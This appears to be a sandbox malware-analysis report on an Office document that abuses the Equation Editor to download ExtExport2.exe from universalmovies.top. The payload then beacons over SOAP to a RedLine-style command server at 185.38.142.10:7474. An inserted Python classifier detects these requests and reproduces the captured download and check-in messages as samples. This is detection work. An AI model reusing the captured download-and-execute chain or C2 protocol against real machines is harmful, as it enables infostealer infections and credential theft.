                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.38.142.10:7474
                    Source: global trafficTCP traffic: 185.38.142.10:7474 -> 192.168.2.22:49165

                    Networking

                    Source: Malware configuration extractorURLs: 185.38.142.10:7474
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 7474
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 7474
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49165
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005AC14B LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_005AC14B
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 185.38.142.10:7474
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.38.142.10:7474Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.38.142.10:7474Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.38.142.10:7474Content-Length: 246270Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.38.142.10:7474Content-Length: 246262Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: Joe Sandbox ViewIP Address: 172.67.162.95
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: NETSOLUTIONSNL
                    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                    Source: global trafficHTTP traffic detected: GET /ExtExport2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: universalmovies.topConnection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005AC14B LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_005AC14B
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EF2D272F-8010-4272-8E46-58178AC2768F}.tmp
                    Source: global traffic | HTTP traffic detected: GET /ExtExport2.exe HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: universalmovies.top
                        Connection: Keep-Alive
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: global traffic | DNS traffic detected: DNS query: universalmovies.top
                    Source: global traffic | DNS traffic detected: DNS query: api.ip.sb
                    Source: unknown | HTTP traffic detected: POST / HTTP/1.1
                        Content-Type: text/xml; charset=utf-8
                        SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                        Host: 185.38.142.10:7474
                        Content-Length: 137
                        Expect: 100-continue
                        Accept-Encoding: gzip, deflate
                        Connection: Keep-Alive
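                    The two requests above are the network fingerprint of this chain: a bare PE fetch with a stock Internet Explorer user agent (what URLDownloadToFileW emits through WinINet), and a WCF/SOAP beacon whose SOAPAction names a tempuri.org/Endpoint operation on port 7474. The following classifier is an added example, not Joe Sandbox's code or RedLine's; the sample requests are constructed to mirror the report, the five operation names come from the RegSvcs.exe memory strings further down, and the "no Referer" heuristic is an assumption about how a script-driven download differs from a browser click.

```python
"""Classify captured HTTP requests for the two behaviours seen in this report:
the Equation Editor fetching a PE through WinINet, and the RedLine WCF/SOAP
beacon to a tempuri.org endpoint on a non-standard port."""
import re
from dataclasses import dataclass
from typing import Dict, List

# SOAP operations of RedLine's WCF control endpoint; all five occur as strings
# in the RegSvcs.exe memory dump of this report.
REDLINE_OPS = {"CheckConnect", "EnvironmentSettings", "SetEnvironment",
               "GetUpdates", "VerifyUpdate"}
SOAP_ACTION_RE = re.compile(r'^"?http://tempuri\.org/Endpoint/(\w+)"?$')
# Stock Internet Explorer agent string, as sent by URLDownloadToFileW via WinINet.
IE_UA_PREFIX = "Mozilla/4.0 (compatible; MSIE "


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: Dict[str, str]  # header names lower-cased
    host: str
    port: int

    @classmethod
    def parse(cls, raw: str) -> "HttpRequest":
        head = raw.split("\r\n\r\n", 1)[0]
        lines = head.split("\r\n")
        method, path, _version = lines[0].split(" ", 2)
        headers: Dict[str, str] = {}
        for line in lines[1:]:
            name, sep, value = line.partition(":")
            if sep:
                headers[name.strip().lower()] = value.strip()
        host, _, port = headers.get("host", "").partition(":")
        return cls(method, path, headers, host, int(port) if port else 80)


def classify(req: HttpRequest) -> List[str]:
    """Return the indicator names that fire for one request."""
    hits: List[str] = []
    action = SOAP_ACTION_RE.match(req.headers.get("soapaction", ""))
    if req.method == "POST" and action:
        op = action.group(1)
        tag = "redline-wcf-c2" if op in REDLINE_OPS else "tempuri-soap-endpoint"
        if req.port not in (80, 443):
            tag += f"/port-{req.port}"
        hits.append(tag)
    ua = req.headers.get("user-agent", "")
    if (req.method == "GET" and req.path.lower().endswith(".exe")
            and ua.startswith(IE_UA_PREFIX) and "referer" not in req.headers):
        # A PE fetched with an IE agent and no Referer is the
        # URLDownloadToFileW pattern, not a browser click-through (assumption).
        hits.append("wininet-pe-download")
    return hits


# Constructed samples reproducing the two requests recorded in the report.
SAMPLES = {
    "stage2_fetch": (
        "GET /ExtExport2.exe HTTP/1.1\r\n"
        "Accept: */*\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; "
        "Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; "
        ".NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\r\n"
        "Host: universalmovies.top\r\n"
        "Connection: Keep-Alive\r\n\r\n"),
    "c2_checkin": (
        "POST / HTTP/1.1\r\n"
        "Content-Type: text/xml; charset=utf-8\r\n"
        'SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"\r\n'
        "Host: 185.38.142.10:7474\r\n"
        "Content-Length: 137\r\n"
        "Expect: 100-continue\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "Connection: Keep-Alive\r\n\r\n"),
    "benign": (
        "GET /index.html HTTP/1.1\r\n"
        "Host: example.com\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0\r\n"
        "Referer: https://example.com/\r\n\r\n"),
}


def triage(samples: Dict[str, str]) -> Dict[str, List[str]]:
    return {name: classify(HttpRequest.parse(raw)) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, hits in triage(SAMPLES).items():
        print(f"{name:14s} {hits or '-'}")
```

                    The SOAPAction check is the durable part: RedLine's operation names change rarely, whereas the IP, port and download host in this report are per-campaign. Run the same classifier over proxy logs and the `Expect: 100-continue` plus explicit `Host:port` pairing will also surface .NET HttpWebRequest clients that are not browsers.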
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.38.142.10:7474
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.38.142.10:7474/
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                    Source: RegSvcs.exe, 00000006.00000002.387739574.00000000008E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe.c/s
                    Source: RegSvcs.exe, 00000006.00000002.388337952.0000000004F2D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobede
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net03
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002423000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002423000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
